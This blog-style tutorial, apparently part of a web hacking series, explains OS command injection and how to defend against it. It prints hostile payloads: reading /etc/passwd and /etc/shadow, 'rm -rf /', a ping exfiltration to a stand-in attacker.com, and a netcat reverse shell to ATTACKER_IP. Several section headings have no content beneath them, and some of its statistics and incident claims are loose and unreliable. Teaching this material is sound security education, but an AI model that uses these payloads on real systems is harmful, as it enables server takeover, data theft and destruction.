Hey guys, Rocky here! 💻💥
Welcome to Day 10 of the Daily Web Hacking series! We’ve covered directory traversal, authentication bypasses, and file upload vulns. Today, we’re diving into Part 10: Command Injection—the hack that turns innocent web apps into puppets that execute your malicious commands on the server. Imagine whispering into a server’s ear and making it dance to your tune. Let’s break it down!
—
What is Command Injection?
Command Injection is a vulnerability that allows attackers to execute arbitrary operating system (OS) commands on a server by exploiting insecure input handling in web apps. By injecting commands like ; rm -rf / or | cat /etc/passwd, hackers can:
- Steal sensitive data (passwords, databases).
- Install malware (ransomware, backdoors).
- Take full control of the server.
Why it’s terrifying:
- Ranked #1 in the OWASP Top 10 (Injection, 2021).
- Found in 23% of web apps (Snyk, 2023).
- Often leads to catastrophic breaches (e.g., Equifax).
—
How Command Injection Works
Web apps sometimes pass user input directly to OS commands. If the input isn’t sanitized, attackers can trick the app into running unintended commands.
Example:
A site lets users ping an IP address:
import os
ip = request.GET.get('ip')
os.system(f"ping -c 4 {ip}") # Vulnerable code!
An attacker submits 8.8.8.8; cat /etc/passwd:
ping -c 4 8.8.8.8; cat /etc/passwd # Both commands run!
Result: The server pings Google’s DNS and leaks the user database.
—
Types of Command Injection
1. OS Command Injection
What: Directly execute OS commands (e.g., ls, rm, curl).
Payloads:
; whoami # Unix
& dir C:\ # Windows
| cat /etc/shadow # Pipe output
2. Blind Command Injection
What: No direct output, but infer results via delays or side effects.
Payloads:
; sleep 10 # If the response takes 10 seconds, it worked.
|| ping -c 10 attacker.com # Exfiltrate data via network calls.
3. Out-of-Band (OOB) Injection
4. Time-Based Injection
What: Use command execution time to infer success.
Payload:
; if [ $(id -u) -eq 0 ]; then sleep 10; fi # If root, delay response.
—
Command Injection Attack Vectors
1. Web Forms
Example: IP lookup, contact forms, file uploads.
Payload:
8.8.8.8; nc -e /bin/bash ATTACKER_IP 4444 # Reverse shell
2. HTTP Headers
3. File Uploads
4. API Parameters
—
Real-World Command Injection Disasters
- Equifax (2017): Exploited Apache Struts vulnerability to execute commands, leaking 147M records.
- Drupalgeddon (2014): Command injection in Drupal led to mass site takeovers.
- Pharma Giant (2020): Hackers used command injection to deploy ransomware.
Lesson: One line of code can cost millions.
—
Step-by-Step Exploitation
Goal: Gain a reverse shell on a vulnerable server.
1. Find a Vulnerable Input
- Look for inputs tied to OS functions (e.g., ping, file uploads).
- Example URL:
https://hacklivly.com/ping?ip=8.8.8.8
2. Test for Injection
- Submit
8.8.8.8; whoami.
- If the response includes the server’s user (e.g.,
www-data), it’s vulnerable.
3. Launch a Reverse Shell
4. Escalate Privileges
—
Advanced Command Injection Techniques
1. Chaining Commands
2. Environment Variable Abuse
3. Encoding Payloads
4. Blind Data Exfiltration
—
Tools for Command Injection
1. Burp Suite
- Repeater: Test payloads manually.
- Intruder: Brute-force command arguments.
2. Commix
3. Metasploit
- Use modules like
exploit/multi/http/struts_code_exec for known vulns.
4. OWASP ZAP
- Automated scanning for injection flaws.
—
Defending Against Command Injection
For Developers
Avoid OS Commands
Use built-in functions instead of shell commands.
Bad:
os.system(f"ping {ip}")
Good:
subprocess.run(["ping", "-c", "4", ip], shell=False)
Input Validation
Whitelist allowed characters (e.g., only numbers and dots for IPs).
Python Example:
import re
if not re.match(r"^\d+\.\d+\.\d+\.\d+$", ip):
raise ValueError("Invalid IP!")
Use Parameterized APIs
Safe Libraries:
- Python:
shlex.quote().
- PHP:
escapeshellarg().
Least Privilege Principle
For Admins
Web Application Firewall (WAF)
- Block requests with
;, &, |, or $( ).
Log Monitoring
Patch Management
—
Practice Legally: Labs & Challenges
- OWASP Juice Shop:
- Practice command injection in the Admin Panel challenge.
- PortSwigger Labs:
- Hack The Box:
- Machines like Lame (Metasploit) and Node (Node.js RCE).
—
Ethical Hacking & Reporting
Never exploit command injection without permission. If you find a flaw:
- Document: Record steps to reproduce.
- Report: Use the site’s security contact or bug bounty program.
- Disclose: Wait for a fix before sharing publicly.
—
What’s Next? Part 11: Server-Side Request Forgery (SSRF)
Tomorrow, we’ll explore SSRF—tricking servers into fetching internal resources. Sneak peek:
GET /proxy?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1
—
Final Thoughts
Command injection is the ultimate power move in hacking. A single unsanitized input can hand over the keys to the kingdom. But with secure coding practices, input validation, and a paranoid mindset, you can lock this vulnerability down.
Remember: Every command you don’t let attackers run is a breach you prevent. Stay sharp, stay ethical, and keep breaking things (responsibly)!
Rocky signing off! ✌️
—
P.S. If you’re loving this series, share it with your hacking squad! Let’s turn script kiddies into security heroes.
Discussion Question: What’s the wildest command you’ve ever executed via injection? I once used curl to download a Rickroll and set it as the server’s MOTD. 😂 Drop your stories below! 👇
